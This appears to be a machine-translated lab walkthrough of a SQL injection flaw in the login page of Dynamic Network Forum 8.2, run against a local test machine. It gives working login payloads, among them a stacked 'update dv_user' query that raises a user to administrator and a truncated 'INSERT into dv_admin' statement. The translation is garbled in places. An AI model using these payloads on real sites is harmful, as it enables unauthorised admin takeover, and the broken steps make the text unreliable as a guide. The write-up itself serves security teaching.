Dynamic Network Forum 8.2 Classic Injection Vulnerability exploit _ vulnerability

I. Purpose of the experiment

Understanding Dynamic Network Forum 8.2 Principle Two, experiment principle

Dynamic Network Forum User login process, filtering lax, resulting in injection, elevated permissions. The vulnerability exists in the login.asp of the source file. Third, the experimental environment

This machine: 192.168.1.2
Target machine: 192.168.1.3 Four, experiment steps

First, the normal registration login
1, visit Address: http://192.168.1.3:8010/, such as the icon:

2, first register a user: San password: 123456, as shown:

Ii. Vulnerability Testing and utilization
1, exit the SAN, open the login interface:

2. Log in using the following statement: San ' and ' a ' = ' a ' Password: 123456

3. Log in again with the following statement: San ' and ' a ' = ' B ' Password: 123456

4, prompts the user does not exist, explained that the above statement has the function, the user name place enters:

,; update dv_user set usergroupid=1 where Username= ' san '--

5, prompt username does not exist, we again use the correct username and password San 123456 login. In the control panel-what can I do in the click, after the display is already a user of the Administrators group.

6, San user as Administrator, exit, we again use the following statement login, password is the correct password (here steps important):

San '; INSERT into dv_admin

7, open the Administrator interface Http://192.168.1.3:8010/admin

Use user name: admin Password: 123456 successful landing

8, after landing found is the administrator identity, as shown: